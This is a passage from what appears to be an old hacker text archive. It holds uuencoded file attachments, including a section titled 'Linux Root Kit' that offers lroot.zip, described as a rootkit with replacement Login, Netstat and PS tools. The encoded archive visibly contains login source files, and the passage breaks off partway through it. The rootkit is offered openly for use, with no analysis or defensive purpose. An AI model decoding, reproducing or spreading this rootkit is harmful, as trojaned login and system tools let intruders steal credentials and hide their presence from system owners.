  9653. hfic5v9lMMmxMqtwx-CvpHQEO6sLhzT1xxunjL1hS317zn86PVkowxtAHV4vo
  9654. hU0phOy8CzQ-nfKoQrddA4+oDKS02Hj17gP2RizeCvMNFs5uMFuvjAQinqHlo
  9655. haCilo7w56sRODfWS3Hkkk1UBaynCXKuM5x-TTlsVZeZjiqBrN04C7fA0VwqQ
  9656. hMCd4YKCnKS-zQapsW4ugW4URytC7TyRupqnYSvO9Uo92UiCaHbG6nrjPCR86
  9657. hIo5Hm9Q-QVt4k2tY+Oq6pTfUTw6i6GZ2+jwwDr75HVAUr7-B+-yWGOQZxf6o
  9658. hkOGXWSJCbM-Yhvx602kcGGEa-DWoto1Q5oA9spk8H9MzaYx-zJOgh-rEVkzx
  9659. h+NhOYFCspWFA-Iw8EwEm4wHQkHPNVaK1vIFiW3Casr20+AH4gKB3Qn+RJ1iO
  9660. h-lYRA-5usyUCp0P66Yb+79C7xN1Xl-dxxDmvWKBTCsULRJkn2EILKkHwXGNn
  9661. hqoZlAhjtt2nw4H1ksK5FlV3-OiNBRik25tq7wo-GRA5GEP0QKHw6WRaLqunb
  9662. hi0EYlCNNIuT+SnkzvGOPmyC8SEIKDnUc1J0OnlnDVXs5-EEQHTr6WHY9UN2+
  9663. hoBhg1-q3QVCSlA8NAo6zUe2iCZW+5iFlLkd1cHEQMtte-XDo2zCWpJQND7zr
  9664. hxTROFyqksojcJ3ZTTOTqH6CpSVrKpbhaLngSa5fTM5zzSwi++FgPq2KlcLT7
  9665. hp3zCyudVA9rDh9DnfUNs+54zpHAppKUmfRTi1XdOvlp6SK0mbaumfbOaaE-a
  9666. huYqQ1l2hXaHu0HhHyypHyBYupfeOSIY2bKVa1uQvUTZOv9nJBvLqcBjegzB-
  9667. hzpkr0-jmpR4ARfSZbOaRPEN2kAFATExgASCopSpay+FA4HODJG0lRRkZL1ED
  9668. hgBbFyafPF5vGdnN61OXfBdZlffMpT3-zIM4JJjym8R+Ougw1+67ClBNdbPLS
  9669. h+LCB7K6-ZPE5TTIA0EN-46BXkxHAUOamRvfSAF+Jc1TIzbihfFd5f8gP794-
  9670. hcHNV2fB3okAK2-RokzDlkB-6Q3fDJDjxkPaduHo32Nre3m+N69M3cngYN9p5
  9671. hD6CExDsZsYJtY+uOvC7IVTMymdGYpY7N400xhcbM72WM3SFdGgmmbjeies5I
  9672. hqmfqucXcEXBI-JGa4EWUwNYjKdT2ss1MFqI-PTlFAhsaeNFd7unJSOwVwE6M
  9673. h1A5EVB5c7sX749FDVTHF1rPKpftnltvhX04KSh5OncgEsy46XKugU6KXISXO
  9674. hjpulBumCTbT6zfjlbE8FPk9-pUarFvJLqkSg2IQBVFrgvCzjz9-LDk92Ae6U
  9675. hlTALnHtY2cfa7oVHyt0CTnXMqTpyNrSDvLpziDirkvpLPDck0g15aLczMryd
  9676. h5upx-z5-5PCR3tU2W3vC+31jSYvBJ9juiKb6jxhbbTGroKoDSuon3Jd2b4Gj
  9677. hfK-avIHCl5CWvNgTdMvk6Rm75aN+sK6nd-7gZNd507dheoBZsEHKNDia9fSC
  9678. hvF0bmfE32BhnHNnYABTer2BOwLXfWRNJOmxuHaE43WHABqnre3M1oTHwW57f
  9679. h02I4t09cwVn51X4wUYMSI46UiBcAYbvoMAybguApo1eOlbkqgY8bcT1kK-jE
  9680. hHxM+N708Fcv0Yr7kHIZH4+w4rYyyOuy7kL4rEXq-Qkr72Z634Q49iDBcvFzN
  9681. hPhHYu6VXivhl7n-fMkEg7GAIxUkMJBUzpadU++orV6Hc-314IFACGo-VKCHD
  9682. hNnDeDZefDOvJsevBnGCOsb5hASPNQ0915rrINp5ABtG7otbXVN1-gH8-H1kS
  9683. hCs21UeGOtGLM8WP5Zq1sM+mFAkoZIO+9GGX5RdBBA+2raHzXNRq12rey2UCn
  9684. hAUUIYL1A4gH2ZkR0M3-+E35dF05As-TCg3O1TkoiQ4KRY82Vz8w1KNVDXcso
  9685. h0Fom3YGBp-Ax63a0M4ysgAaSqdOr+TK6nmhD9c3bC8EqVUHfFSB4423i1deg
  9686. hfUO-5lkm0z9hR-OVlF4tzbUA6VDogRrvtzTPjrZpHWVjF1o7rfPqMVqhmX1P
  9687. hVTyIC1dYi5dQymyVNnBPFo3V320hU0uK3-z21QA8kbMyn8yj2R1pg1WpsZ6D
  9688. hh1nrEjTOUl2YsRXxHg-aTxpzxJS8Q0+Eg-+fg-5NP-sdxGD7IQ+wsZ4BAEkf
  9689. hx-HgW9o2pN8syTduAWSu-6UStZ-+3uC71ysLxmZ5mJ-2lL+QY-KAdXBe+4Jh
  9690. hpMJHYEh7QKEApO6LExrJIHQm0Mb56PfNEmAqBJYIHIOQ5L3+fYHiWUgq+yO3
  9691. hkFnbNAx1AclsQ4c42bKQMxtNGI4-4U1bcuG71UGzVio4ncXPoMQtSXeOZrQR
  9692. hrL0x2Cc2VYyPBM2LTBVFsh7wC1Yk9X6cY2B3OOf4w3nh1vhETRECxiLCeSgp
  9693. hvdgDGerFi5zxc9lZxsQDGh3IAmnqotb+gQ+ny4yS4e18HOAuBbAEmUuNw0ds
  9694. hF3q0kkXH-p6aG6zgr93EEO1DFyGwjoKU6YZgT+dIBd25QwIG6Ph72opWCPkz
  9695. h+KGP7+3CIXAbedrxq6k2tLmGpq6gsGkaxjbqzXp34FnQO1Gsx7HprTjlK82E
  9696. hFkxjqQO91LP6BhV4+dk-VSYtNtUyOhkcuEwba4qxKG-Nk+bVPlM0D16AkZwW
  9697. hYWwI06bXOrZPkVZrwYn2SdB2eNXL+i7y0w1lZEKd3228C1u96DCpe+pcn5Um
  9698. h1qzYG9UEVA1WkSxg86ni6r+lxzRtOjVdo3Z2-A3XfIOVUyXWyISC68Cd5OQZ
  9699. hWAbQNuLUIOAu7sL-423gD+hjz1jS3g9+KY6gRg6+389KObDRMVgjPMTuHkol
  9700. ham7AhoXl6Mu3s7dpKssW4MyKU87TXgTCiLyGkJDRpT9dP-cVTjU13VsnR83p
  9701. hiyVyRLmcUkQa5P0OsVrk+-pfJB1kjctCDFpR5h07-rHs++lqL2sk6lROCIzk
  9702. hLtMV55AYVUVNkv6W7yh01oA7QyWAK0YwcqEEauW0U4e-Jzp3DyyKcOHCSUN9
  9703. hqSGcZZELEVbJbBg9mdEBiB8LZrgmbvvOWqAvZvCmQ+BMDAt1eAY9JUdi7iCF
  9704. hVRqtYwbknjSWMS02gpyjU0ZzO8SzFT91SfvVIXNY9YEBeBXUMLAnKJVYFfZL
  9705. hGJ17qc397W0seWAgaC+EXEyguF02GZKAg+FLmF21O2JAGckWRSSJIODj9Y3R
  9706. hWgVC29aw0Wx-UeFB5sNr3bGVEdmV4k6U2WZ5cclIQ3kw8ku2KO5ZSNUJGF7i
  9707. h0hZTVcDnbUxN-GA2Yn2zIc-OYLEGypSGbg4l2iaYclndyREcRDAZOg5bfpJ9
  9708. h2MtereEF-PllxwitwJAQ27D6w89Q-FRFDwY7mx15PZW7jU7NscfYVqs3cY7b
  9709. hFCWbiGDCzPIqbQClUYrn2JzdXVTTk-ojbimC3pzYXYxG19b4Jmea0AQ81Zag
  9710. h45F6zd-7nHEmb5yEGxuN1qp9JgpMQ4ywrg-XbMoTBy6eCvyqtMU6yCv40Fk4
  9711. hAsZemPMWWsJsVVFjJLYFAWCKqXV2f+HkS1Av12OIpl+oBGmQTbqphryJ8GgE
  9712. h8D4pSIXS04K76mc7J6RIh9DDbpByOKo79KipFV24qcgFrDuuSmKJUcPNAUS4
  9713. hceHZG6mmOioYub9Xa6YcogVE+c7Lc1HihxxrucRpEsI8KEsdEaszja25GfNo
  9714. hFkbQ+fhUjp+llEFny0qIJepqixWlRwK5s0shvWwVOG0QKrn4wsq8MfkFsF4R
  9715. hNoLwg16hSsjwdvU+NkjCIlbW8t36rWA3wi9OawLiIo1jvIc9Vhh8QdTXE4dj
  9716. hJuEKFhkaY+IEHHdT6OBGbmZ02MwZykDv-OjljGdvPOXHKTGEiibPhqyJl0HZ
  9717. hNLdstoOX4xZL00qRGUXlaiPZiLdMCdKdxgyoLeivVK+gaGGDS0yhAq9YDkxO
  9718. hrO3a5-PjdKU4yuryTDh3y3ix5YSyfToaWrQW-S7BqfieTEUQuyBF+LtklYv7
  9719. h1BVJLlVhCqBfDcY8lt1fpvQUfC6R+MzxDgRnTFQQ4QmnUFhrmfM620bTGTl4
  9720. h4KFrUC7tAy6qnZKpgs8w0Oscng0OerG5WXKQ2gj60C5l4mYFHzktxg9RgVTV
  9721. h2pIf8MTqDFCuA+fjJKnEg3HNpKhqoeHEfp9DuuuKf4vrySdKN2ROs3MUTTjQ
  9722. hTWgVslJbYQF3IxMYiWRRzO906jFrvvfe3U7hoGatrjpnnK8rn-foYlB+mVOQ
  9723. hROxoE0wDLyKSmvEbgP-2Xmjfg3FbjRO3IOsmvDpXRGEV-RSck7dXOuzIB2j2
  9724. hXF7zPWgIxce0rjsJxXHUVx8+ToZ3WUrGd8xTTuxw9ibSjp8I+a2-LmxLtijU
  9725. hKz-p6D5pQUKy1eftSWblZFXYeqxbYBytslczzf6PfM3tWZS1qWpHJP8a8bJd
  9726. hSezQO9BkzlaNduySRmwDbtGGSD4NmlrdA6KxdEGCaJsnQ8SvHdBkId3NZ+AK
  9727. hCrHF-Gh5qIsfRsBVrgnUnAUJHUSc-dP4l-EZsXyc9jtbJV0tpeF6-r6tUcJV
  9728. hQFrw4IhVCWhcd1PCpcafsQKdDXlf4HzFkJzGoite8VoRs9+uzoJGlEhZOfwQ
  9729. hrOZyYIB59EAHx-GXsvw6bRtHhmtOd0PcgiPFnH-NGuz9UGYiexYS5IT53nQO
  9730. hw8mIZWdMe00+N8sJlGND90LqVo0W8-8bWuazdyefB1HrOgbGehX8r8gb99Jm
  9731. hhIdAoyOaWkhNaRkW53KaZjVvvD1Z5jCNqAZOWDgIUuihN5HiIsmiJatsb-AE
  9732. hISl2tOO0WZZe8UU2eu+mMsYrayPF84JZQlBgL1uNfJ5zFboXptmVHGefJWWD
  9733. hJYx5aPWmKCTmyoHNH8Lqqjr9QnCLd2FfSLMG+5xiKV72s0tHrml9EBFN9kYZ
  9734. hAMPmNGj99pg9FjTJbmh7uCB3MQDQKcYI+8uU7YOp+ZKOQJW6beTkpNBpWaxt
  9735. hgZslBP6btIN212FwQF2UXrpW1J0qke3e+2Rvcy-V3jrvQZxWwcDnQtpPL5Lu
  9736. hsr0fNQ+m6GxBU6IGzifwFnRsGU7vufXhsIzedJPVjU7+WC1OdvQmFjtoWhRJ
  9737. h0Z-qp0Ic2s+eZ3yvQcvl5LvtBUVhWuuw0F6bVylSWBNHnzFClMNY1A5yr3G+
  9738. hdnsZgeM16IZHgNuYkLej95PHKJbZs6tSAfGX9lhMCagbaNKU2oBsmif1wxbG
  9739. hm7eLuXuL8XS-vhbkFCxThDcR9B2CmuQuwMAvj7FuNcITosYGcnpMjOVtTZxR
  9740. hohHmVJBVC0YBq3x-K62f9IUnyG2d4MFcRBhZKy9RRfpWblAG-zrST0Df4aoU
  9741. hTiwX2uErgTJYo4iLFqhyNGsSLHloVN0R2sQoCVuQBmk-oqqxAuvKwP4fjZSv
  9742. hltddd6mFj6UqLQdilNJu105jJqOFh3gx2xwkSuSKMYZ-mh4wPzLdTP3G713+
  9743. hCMeCSh6ORAiN2To900eLOjUzjese3L4fzFDS6DkATuZIKk7yoVoMdpeDVcXb
  9744. hZMTVmpn7CDX--qNKgcI6q1wPUh9D2UaTFN2dczzAgZNHNi5wK4XFCaayeVB0
  9745. hgCaXVK5jKxq-aZqFBscUYhiguyiop0q+qRl9c6XqaZHSYDhzilCCPDUFuPh6
  9746. hK4bSTadaaTeqIt3L2dT42uM6PmDwxSJJ2Vg2mcV8Ma59WzOwTvKCx+rJXgOB
  9747. h0lw89184AzihQoBvFu1WiE6OrnAQaepX+cxzJA-rBOUpquQukQQz8i+Lb8z8
  9748. hxWUeYtX+GBumxTUFlioaFxKN6nWMtdwBacWqHudANQ2XxbBbOwJdgBHm2BqG
  9749. hovLeqjQDCT6fGB097KuqhiJrIkvXAX7rkLgoCwepirVvdAYG-mh8u6GGPsci
  9750. heJcfnpPZ5QvzmwSg-KQ2mCnKJi2h6bnbEIlLqDwajEJTS5yvZ31BGCtk9lAI
  9751. hU5dWIvh88YZwt-eKpvnNSUNK-vLF1ByVuyXp6mMh-TODgb0k42UUSqMJ98pp
  9752. h-0mxOJ+38y4xeA19Tp8B6V7HvcsT5PrZBkF8nGrYZSNcZhk4miw8l6ecl429
  9753. h5-YHWqYfhc2mT8Y397gtUIiWVZHD5NSKQLVPXMy9-MVrmHv0zqZzChtviQrh
  9754. hjGkIG9QI+S89NNnJqwoxP2krcbAtBlh1PYKhMOUdu8qU8K2yVm+iCDYKho1o
  9755. hQLDnGfcD-nUcWJAqeWJPLfhBhdse0+6Yf3hQ7H4Vz4NHFH+HwWC7k9mrT16a
  9756. husjOQIThrqI5YW4Up6ElGB3vtTLWsY4Aj4VQn3MpieqOGJazR1HXj8irmvRX
  9757. hThYWYBPZ3c1FmT5zwohWvBhT2AgTVPnLyZI5xE9UqwctgvDsOPWsSvGWA3R5
  9758. hdDJCmbOmg0hZ9oJn87LuaH97wryTsuRilAMo0Oswan6F4-Mq1IEmfMbhqTSs
  9759. h4XwgWdb3JNBU4ulbW-WCebmR3j9Ui7glvKYcmX4HhNEAQP1ACpkq0Q-wrHGe
  9760. hoJsm0I-woFFmI6i3ZV4rmtRi4EKhfohl1ex2PxErtBEJ2m4O89oIbt1aORnZ
  9761. hXMzQTnCbfjYnJyv2uQgLVJMAYbaySy19ci4lERvS284uJWGeltnA-53lJmmZ
  9762. hNn59OvLGoy+AZgTW67Ge6wOQJaDG-S8GyodEDgYJTus8qvp8fY8799XuEWpR
  9763. hLGIyjPTm9OeGRJcgWwSmhkH82rpJXeza9rblaYiTje10u0ermOzhHu1E43aH
  9764. h0TyOlhHuW4xk-2vulPccVVDji9gVcoABz96489y53YH+RzXJBmxoPT4FAE2D
  9765. hK6Ctlq+8wF2rf-Dl4qYyELpo+gyNg2NoAkyd6LEa6-QZzuKO1AroVeZwkXzr
  9766. hr5jy2gjM5cNCJDD34lwbbS5ze5qxgQszc-7zOmEn9joC1BeTSIYjlnSIy5ge
  9767. h-FDJ+8qVaco6x+CJ6S8iBN-AFN-DDNhvI1NkSe-kk+ySfDit3bETzA65TUIC
  9768. hDp1o0SGA5EdzcQNm6n7+oyne3moH0OrU6FgUF0qSwdDMaO+oWVvsiz9o4NN3
  9769. h5cLswbl847vCuvRXJXPdl2UA7nfl+zLSXN7rY43ug2cDBzAK41Jv-zhzqpIG
  9770. hrKgSzIMtbPWS4xvUnsMGTxAYyTtCPbkgSxj5YJkqYHA7FdxUP6oylrASy0Ab
  9771. hlAwQDi1LzjkdTS3EjCVImxaqa0zyIUHsxDJkD7xAc08NEqNOxtn6lIO30yu0
  9772. hk07uyQfZIlG89YQh0KMuhHmPN0Ba3NxD282bryM2kScWB07zNck0lz2OSt6A
  9773. hJm39oVSqtSL1NLe0J356a3bsYIQSHw0emnaIPMKgV9ysocPixCBCOJjw9FzN
  9774. hfC9LnP813p2P2Oc6nFryB3Zy6fuOs9p5HtduX7x4R-92s5Tk03Z7h0XsKmWe
  9775. hXB7z+J-9+E6I-Uc++++++0igCW6++++++++++++++++5++++++++++++2+1z
  9776. hEE++++-0MKtdQqUjI2g-+VE43+++++U+j3Bw62gKeAVz-+++QEg+++w+++++
  9777. h+++++E+U+9O-7E+++27VPaZnO0xWMKtdQqUiMp-9+E6I-Uc++++++0igCW6+
  9778. h+++++++++++++++8++++++++++++2+1zER22++-2NKpjPZ-dPaQjI2g-+VE4
  9779. h3+++++U+l4hm6-4QwBdc++++b++++-6++++++++++E+U+9O-yEE++2FZPKxi
  9780. hI4ZiNmxBMKhZNaZgNJ-9+E6I-VE++++6+-pRT00v+gODwGA++Dhc+++E++++
  9781. h++++++2+6+0qUN23++-2NKpjPZ-dPaQjQ4ZiNmtXI2g-+VE40U++++++98ku
  9782. h6U++++++++++++++++U++++++++++++E+Dx-g0Y++2FZPKxiIrIjI2g-+VE4
  9783. h0U++++++98ku6U+++++++++++++++-+++++++++++++E+Dx-pWY++2FZPKxi
  9784. hIrIjIaJbRKlVQWxEGk203+M8+++++++gf1cW++++++++++++++++1k++++++
  9785. h+++++-++zo228U++F4JhPqtHRGxHO43YPrQjI2g-+VE40U++++++98ku6U++
  9786. h++++++++++++++k++++++++++++E+Dx-AGc++2FZPKxiJ4JgPaJo9p-9+E6I
  9787. h-VE++++6+6UvvDHtYwyK1+M++6+A+++J++++++++++2+6+0qUJge++-2NKpj
  9788. hPZFZP4tZR0xVRLFcNKtX9aBEGk203+MI++++0+06Cyno6zQmz1R2++1g++2+
  9789. h3U+++++++++-+0++hc4OA+++F4JhPqtINKliNLEjMqxhPK3iN5AiMp-9+E6I
  9790. h-VE++++6+6UvvDFhVUlZB+I++7E8+++J++++++++++2+6+0qUEJp++-2NKpj
  9791. hPZFZP4tZR0xYNKNdPaJn9aVEGk203+MI++++0+06CynoAfOWU2UE++-YBE++
  9792. h3E+++++++++-+0++hc3gSU++F4JhPqtINKliNLEjNLVoNL7iQmtcI2g-+VE4
  9793. h3+++++U+W1jgx5d4RGdu-+++pkU++-A++++++++++E+U+9O-tsc++2FZPKxi
  9794. hJ4JgPaJo9qNYQqJo9aVEGk203+MI++++0+06CynoK3kRiII2++-h0+++3E++
  9795. h+++++++-+0++hc4GXk++F4JhPqtINKliNLEjNqJiNL7VP0tcI2g-+VE43+++
  9796. h++U+W1jgx+1U9rFr-+++u+k++-Q++++++++++++U+9O-0dE++2FZPKxiJ4Jg
  9797. hPaJo9qldMbFZP4tZR0tVI2g-+VE43+++++U+W1jgx0MtoI9R0U++TFc++-6+
  9798. h+++++++++E+U+9O-hdU++2FZPKxiJ4JgPaJo9qpVOKsiMp-9+E6I-VE++++6
  9799. h+6UvvDFzEijXHk2++-o0+++I++++++++++2+6+0qUQCX++-2NKpjPZFZP4tZ
  9800. hR0xBMKhZNaZgNJ-9+E6I-VE++++6+6UvvDHkdIm0f+U++0QG+++J++++++++
  9801. h++2+6+0qUIGZ++-2NKpjPZFZP4tZR0xiNLFrPr7f9aBEGk203+MI++++0+06
  9802. hCyno1MoeX6M-++-q+U++5U+++++++++-+0++hc2XfU++F4JhPqtINKliNLEj
  9803. hIYJ-F2p39aFZPKxiR4JgPaJoI2g-+VE43+++++U+W1jgxBPltKYh0k++lW++
  9804. h+-6++++++++++E+U+9O-tOw++2FZPKxiJ4JgPaJo9r7dPaQiMp-9+E6I-VE+
  9805. h+++6+6UvvDF+sqQeOEM++1kC+++G++++++++++2+6+0qUI8v++-2NKpjPZFZ
  9806. hP4tZR0xmOKtb9aVEGk203+MI++++0+06CynoJ1WwPtgU++0yN+++3E++++++
  9807. h+++-+0++hc5PkE++F4JhPqtINKliNLEjQrZnLq7nN0tXI2g-+VE43+++++U+
  9808. hW1jgx9mf1ZhMCE++EAw++-E++++++++++E+U+9O-eS6++2FZPKxiJ4JgPaJo
  9809. h9rFZP4tZR0tXI2g-+VE43+++++U+W1jgx+RNQt0N++++DU2++-g+++++++++
  9810. h+E+U+9O-Alk-+2FZPKxiJ4JgPaJo9rFZP4tZR3xXPqpkMLEiO3-9+E6I-VE+
  9811. h+++6+6UvvDEv3RPPK+Y++7QJ+++K++++++++++2+6+0qUEIR+E-2NKpjPZFZ
  9812. hP4tZR0xoNL7hOKtVP0tXI2g-+VE43+++++U+W1jgx4JNmfio1U++KmI++-E+
  9813. h+++++++++E+U+9O-YGM-+2FZPKxiJ4JgPaJo9rFiAn6rA0tXI2g-+VE43+++
  9814. h++U+W1jgxBS2x5am-+++B+Y++-A++++++++++E+U+9O-RnI-+2FZPKxiJ4Jg
  9815. hPaJo9rFtQ4Jn9aVEGk203+MI++++0+06CynofMF8AvcJ++-NJE++3k++++++
  9816. h+++-+0++hc3OCU2+F4JhPqtINKliNLEjRLFdP4ZoOKJn9aBEGkI4+++++-o+
  9817. A5E-I-k++GJ+-++++
  9818. +
  9819. end
  9820. sum -r/size 30187/121254 section (from "begin" to "end")
  9821. sum -r/size 44118/87987 entire input file
  9822.  
  9823. 3. Linux Root Kit - uuencoded
  9824.  
  9825. This linux root kit includes: Login, Netstat, Old Netstat, and, PS.
  9826.  
  9827. begin 664 lroot.zip
  9828. M4$L#!`H``````+2^1"+=R\9L*````"@````.````;&EN=7@N<F]O="YK:714
  9829. M:&ES(&ES('1H92!L:6YU>"!R;V]T(&MI="`M(&AA=F4@<'5N(0T*4$L#!`H`
  9830. M`````+(;/B(````````````````&````;&]G:6XO4$L#!!0````(`'2>2QW)
  9831. MZQYI=P0``-<+```+````;&]G:6XO9FEX+F.]5EEOXS80?I9^Q6R*NI*M.));
  9832. M(,%JY9?6!A8-TH=TGU(CD"7*)F)3!DDE<1;Y[YTA1?FHD^T!U#`DS7".;PX.
  9833. M>='WH>]5_)G)84&?\RU\+ADR@"@NU(9+5D(M0#7K80&Y*.$VYT+?ZES#:!BC
  9834. MV(7O?\=%L6I*!I_45EWH[8:IX7)\Q%:H\E>NYFMVQ-4EKP]9C>#()9Z_1N\0
  9835. MY')11/AX#'T$XQ&9^L4REUZ_3^S4_^I[C5!\(0B^Y(O[0A91T4C)A#;?FJTW
  9836. MZ9X0:4/)JRJ)Z#F*YDUU-XIG*&,,(UA445K>);'AXF=3:/`H+J`'*G1LC^)Z
  9837. MS%=0T<?=:!9!35\1"'H=RKW4@H%^(3BK6BS`V]2*:UX+9$P_7T^\/AG&0,'C
  9838. M$18G2U+?1T9E$_'IIQ"^-BI?L"!,V3/701*FK[YOD)'$XUTRBWHMQ#!M5;&B
  9839. MNT67HO!#%H?@C!P)8A2]O10>R:*_C4205="E*CHK-O"]PO]9Y%R9]X\S,F[E
  9840. M=N*&]TT;HYFS]88-WS-ES`(75"]^GD[#\V`/NV6A/K5!MK\R,,JA$9A.4:*J
  9841. M9<"S..6?KE(^&(2^A[T%`)0:TNXE(=`;,DN/Q\@80/Q\%<=Q:D392C'C"<;C
  9842. M#+!ZWJL%.<J"0Y1Q'(['5XC56#X$24^#;O0_H"-]HW#>M4:6H:I-K7F>)ZZ5
  9843. M@@K-5_6&B:ZCX$P.YF=A"%D&-U^NK[%%C3.H;(&QK73)I$1!,W\^PL^Y^$$#
  9844. M&<%:_R'.(M@K,VGNNA+Q58JQAZ"*XNOH=C+Y]7YR\PNMN)V359JM5D$5GB>7
  9845. MZ4[:+5N=V\GOI%-)EI<!;HTHN8R2J`H/THKZ-J]M4FDL\)EI_3:B+B87DHOH
  9846. M.E<:DDN8;S53(&H-+TS6&)J+Z$U-FPN:P\62%0^X`P^U<`;$'35'_`^6:@N'
  9847. MZPX=P8UGMF!IQ[FRG)'EO)L=6G^27+.C#%$-BE6M&"8Y]7S/>BZ6Z[KLFJ`=
  9848. M.4.E[Y'-0@?JC:AO:M@PN>9*(0C0-<UDL6!`NCC$,8-X#!5+#'_%=ODX:`N'
  9849. MHGX2IU`TO-PG%[S\MYC0`9-_&Y0]!>+94#_>*U9X&>RAR-L3P0HEIX76K9`Y
  9850. M/DY*%`=FK*\&I;)]NX;1V3`4-9)+W()I6JNK,M\&/7MB]?!D^E:6;+_2/@+2
  9851. M@;H"M/!NC=2!*_$/7:'V"4^=\8;65-<!)@/&,.Q^[]K?=1ZOML;3SH5Z*TFX
  9852. M+)ENI(`8=P2>P#YN7-J-*Q;1`&UO*$2G?G?QZ./2X7T%M=KSGD=0M)<`,)<`
  9853. M<S\09J!8$0^Q5ZL%SM_XQ#0VKG$4_\=!3&;<]+$1=L6D"(UOSZ)JB:<EJB"4
  9854. M`FELJ@*'1`@?,IC\-NT`6(7!H#7<7C5Z<8+#MK5+C!,GECFR6B%W9A&;Z$%F
  9855. M4N;('N)Q9Z6;CA@M;EP#J85BD]A!>3,UIL.M>NVRXY+3#42RC#35-;.E;',6
  9856. M(QN[HKVJ4<F/>_`++7UL6^UD@YK++!=XLY1LL\H+ML9["\SSXJ'96+U7_T]0
  9857. M2P,$%`````@`SIU+'9:Y)I?9`0``;@,```\```!L;V=I;B]G971P87-S+F.%
  9858. M4E%KVS`0?I9^Q<UAB9R:NMO+!F[VTJ5=("S09(RQE.+(4BWF2D*2.\+2_?:>
  9859. M;&\CT-$7V7?Z[KO[OM-(:=ZTE8!S'RIE3NL/=/0W%82[5\8?)R77H3E.M5IA
  9860. M]7'.[WVN#.^A=%0)J;0@F\TWDN25>,A#V">4YE-8>-\*L,[<VP"EKL"),AZV
  9861. MV<-/%6H0O#806J=%!49*F.:4UZ6#Z9T(MO2><:-]@#XW$*7T%R4^N)8'&%0`
  9862. M=MQE>/CRH:"DAW.+OTIC-7XO%\LY3!%1Q-HR*-Z3VETKO[]Y^_ZFH`B6P!AB
  9863. M8`:R,E9HUATH+(/5[?7'K]=I!HE+TA1F,_C\9;E,*2%]0;18([EHO,"D%P&9
  9864. M(UD&K)\G[0JZ/M$[)E4CM(D09-U<7,TWZPS&44E:O(A!H1U5A)_RVT8VY1V,
  9865. M9_";S2\^K0Z+]>+JORSKHTZ42.O0)LE0@G`.%;[V2?;'[`*D;%I?#[==`;<H
  9866. M.#J'':1QP(HB!5P*X9C'S?&N%5ZBHXQ'KR9;-X'#`89`_POFJ\MH(MGAT_C1
  9867. MEZ!A%LYA/.SFW4T'P'V>G"!_W.8CC2%$JK/),Q*2K=OJY-G97W"D][4;(N[U
  9868. MU;#8.('DC?%BD$:)$_'=LC@DQH_T"5!+`P04````"`"YG4L=PB>=?<8B``"D
  9869. M6@``#0```&QO9VEN+VQO9VEN+F.]7'MWVDBR_QL^18<YB24',/8DLY,PR5QB
  9870. MXX0-!B_@3;))#E=&`C0&22L).]YL[F>_]:OJU@/LS.R]>S8GQR#UJ[JZWE7-
  9871. MP;Z:+/U$17&XB)VUHJ^N%_O7GJOF<;A63YH_JE?C$Y6$\_3&B3WE!"YUJBJE
  9872. MDLWE;]XL56FHTJ6G9F%T&_N+9:J",/5GGKKT5N%-LXJN$VJ/PIC[OCEO7+Q7
  9873. M2R>A#EZ@UM3YVDEIO<M;GL</9D[D7/HK/[W%V'"N]N)5N/"#O0/]Q=U3-#SR
  9874. M8CW93\VGR@)@?VJV;(8G=H)D3NTWU#F\48G_#R\14(Z73K#PDN?\T%"OO<"+
  9875. MG96>"#`ZJ1\&3761>%AZ[LP`B>\EV)9RKAU_Y5RN/(Q6!*L>:'G-15,E7AK%
  9876. M?A@3Y':^0V_EK_T`6VS*J(MT'1W<T!_J$[@K/UCDG0$!.@ITC#=],IN$8,!1
  9877. MS,+U&INE@01B!'`3;/K20Q\W@VP6!@&=#S43&M*E8A!S#/I-CQX#[T8)<LV:
  9878. M;\[5W'/234S+K;QYJL)-^EQE_ZCS`A`3;BX=5\8J)TV]=90F6/;`2V<'E[2[
  9879. M>K5"_S"&CO56@7@2+V`:2&X3&EC-.D1.DMR$L:N\+Y$?W^8->_M\U+)*LO16
  9880. MJ[IR7*+`5/ES=1MN5.!Y>-3``S_?@?[OFS!UU&SIS:Z2>Q<W[YW`6=TFQ!"T
  9881. MU=2+<88KE=Y&GK)2.FFSCGW7TNDR#F\"0D>V]MB;;4`8&0(S-!BR^)U_S*:Q
  9882. M]_>-CP6P=9IAZ5P32RI+R,8VB#5;H$<Z&-5H@#-`.#22:6&K7X[OOI.DU+)G
  9883. MMF*HHD-PI\!$X*>TB47,'ZZ7$C\D.?DZ[F^;!,Q,QS5WKL--3&-D>\PH=:%"
  9884. MII$$&/%HFCK-,W<VJY2.(ETF+&(@";S@VH_#8$U$(U-<.[$/YJ,N2>(O`A$:
  9885. M>V7Z?><I-U3[Q*U+0O,^X]E+-]&!LZ)35``[(2;WZFH3N)D(28%=D6M*,Y,;
  9886. M$G_1_`O`>*#YYB#U5H&7N@<)(5.AA[=*-);._-G2\5;J]8H8PUK0W_]R'>+]
  9887. MIGMEL^@)U]$&,(QGOA>0A#SQ(B=.S?XZ3KS<).HB(.D;)UKZG7C!VHFO>/[#
  9888. M9\]:C=:?&JTGYO&PT7K6.'JBL-9SO9.?Z:1!#L^WJ*I!`NP&-+[R9^GJ%DB!
  9889. M3`L:EZMP=@6*7(<NMD2GD<QB/TK#F)C$#$[2>.;0D9'4\A.>"K"#(GA9#=!1
  9890. MHT7_GQ(`WG-USD3)1YFDF_D<>.W[P>:+:C4/CZK[!QA4/=BOJGW"C=$>ULRF
  9891. MF7YNU?'W3_SW9Q:$(V]!F!)VI,<<3WAS[*S\>1@'OM/$=)W52O%T8)G$BZ]9
  9892. M^/)*(\_U:3/^Y89%(XB-Q"8(-B%RG8F&NR1FCV\5S;A.6')%$``DY5Q,02+Y
  9893. MVG=Y:T[*P#B7X?4=*E`H&>K5B1V2XM$2DV$*=X-S<#2K.`1NLIDMS8*!GMH)
  9894. MB,?"V08DPGJICK&.2QM/_83/C*8@IE@E=1Y%1$_TE;VDS:]X#3`!S<\KW[5[
  9895. M9W9%1[KRW(67;RK3^3<.K()KTN>1($"KZON.H*Y>>?&5M_)NFZ+[`V?MZ7/#
  9896. M\,*XM7/+BE4K+P#JD<J.H7UC()KL`]:![F:69K8))F'SA)&;PTFBC>2]2B)O
  9897. MYL_]F6)MK&X@K*!;<88D.$B]8X+)F]Y8C8>GDW>=45?1]_/1\*^]D^Z)^N__
  9898. M[HSIQ=Z>Z@Q.U+O>Y,WP8D+?/ZCN^_-1=SQ6PQ%FZ)V=]WO4GR88=0:37G=<
  9899. M5[W!<?_BI#=X7<\&]GMGO4EGTAL.ZK1HUPS##/E(-3Q59]W1\1L\ONKU>Y,/
  9900. MO/II;S+`BJ?#$0GA\\YHTCN^Z'=&ZOQB=#X<=[&5@VKU!W].TFP.HR"MDAB*
